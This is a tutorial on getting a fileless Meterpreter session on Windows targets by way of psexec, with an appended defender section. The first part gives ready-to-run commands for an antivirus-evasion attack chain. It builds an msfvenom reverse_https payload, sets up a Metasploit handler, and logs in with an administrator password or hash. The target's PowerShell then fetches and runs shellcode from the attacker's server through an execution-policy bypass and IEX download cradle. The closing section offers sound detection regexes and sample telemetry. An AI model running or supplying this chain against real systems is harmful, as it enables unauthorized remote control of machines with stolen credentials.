In this tutorial I will walk through how to create a Meterpreter session that bypasses antivirus by never touching the disk: the shellcode is injected directly into memory. This method is useful when the normal psexec exploit module fails.
First, there are a couple of assumptions to start with:
- You can communicate with the target and the target can communicate with you.
- You have already obtained administrator level credentials or a hash by other means.
- Copy Invoke-Shellcode.ps1 to a local directory.
root@Oak:~/PowerSploit# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
- Create the payload using msfvenom and append the output to Invoke-Shellcode.ps1
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.38 LPORT=8443 EXITFUNC=thread -f ps1 >> Invoke-Shellcode.ps1
- Start Metasploit
- Configure a handler to receive our reverse https connection (Tip: useful for IPS evasion)
# Select the handler
use exploit/multi/handler
# Set the payload. This must match what was set in msfvenom
set payload windows/x64/meterpreter/reverse_https
set lport 8443
set lhost 0.0.0.0
set exitfunc thread
# To receive multiple meterpreter sessions
set ExitOnSession false
# Run as a job
run -j
- To execute the PowerShell script, we will use the psexec_command auxiliary module.
- To both load the PowerShell script and execute it in one command, we download it with IEX and call Invoke-Shellcode after the semicolon.
# Ensure to properly escape the single quotes in the PowerShell command
set command powershell.exe -exec bypass -Command IEX (New-Object system.Net.WebClient).DownloadString(\'http://10.0.2.38/Invoke-Shellcode.ps1\');Invoke-Shellcode -Shellcode @($buf) -Force
set rhosts targetip
set smbuser targetusername
# The smbpass option can either be a password or an NTLM hash.
set smbpass hash
# This is optional, but I've had success with cleanup using the delay option.
set delay 20
- Run a simple HTTP web server (Tip: its request log shows immediately whether the target was able to fetch the PowerShell script.)
- cd to the directory where the PowerShell script is located
- Start the Python web server on port 80 (the DownloadString URL above has no port, so it must be 80; SimpleHTTPServer is Python 2, the Python 3 equivalent is python3 -m http.server 80)
python -m SimpleHTTPServer 80
- Run the exploit.
- If all goes as planned a Meterpreter session will be opened.
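From the defender's side, the chain above leaves a distinctive footprint in process-creation telemetry: a shell spawned by services.exe (the psexec-style service execution path) whose command line carries an execution-policy bypass, an IEX download cradle and a call to Invoke-Shellcode. The following detection logic is an added example, not part of the original tutorial; it assumes Sysmon Event ID 1 style field names (Image, ParentImage, CommandLine) and runs over constructed sample records.

```python
import re

# Command-line markers of the download cradle + in-memory loader used above.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-e(?:x|xec|p|xecutionpolicy)?\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "webclient_download": re.compile(r"Net\.WebClient|DownloadString", re.I),
    "invoke_shellcode": re.compile(r"Invoke-Shellcode", re.I),
}

def analyze_event(event):
    """Return the indicator names that fire for one process-creation record."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event.get("CommandLine", ""))]
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    # psexec-style execution installs a service, so the shell is a child of
    # services.exe rather than of an interactive parent such as explorer.exe.
    if parent.endswith("services.exe") and image.endswith(("cmd.exe", "powershell.exe")):
        hits.append("service_spawned_shell")
    return hits

def severity(hits):
    """'high' when a download cradle and a shellcode loader appear together,
    'medium' for either alone, 'low' for a service-spawned shell by itself."""
    hits = set(hits)
    cradle = {"invoke_expression", "webclient_download"} <= hits
    if cradle and "invoke_shellcode" in hits:
        return "high"
    if cradle or "invoke_shellcode" in hits:
        return "medium"
    return "low" if hits else "none"

# Constructed sample records, not captured telemetry. Record 0 mirrors the
# command the tutorial sets with psexec_command; 1 and 2 are benign controls.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe -exec bypass -Command IEX (New-Object "
                    "system.Net.WebClient).DownloadString('http://10.0.2.38/Invoke-Shellcode.ps1');"
                    "Invoke-Shellcode -Shellcode @($buf) -Force"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
]
```

PowerShell Script Block Logging (Event ID 4104) will additionally record the downloaded script body, including the appended $buf array, so the same markers can be matched there even when the command line is obfuscated.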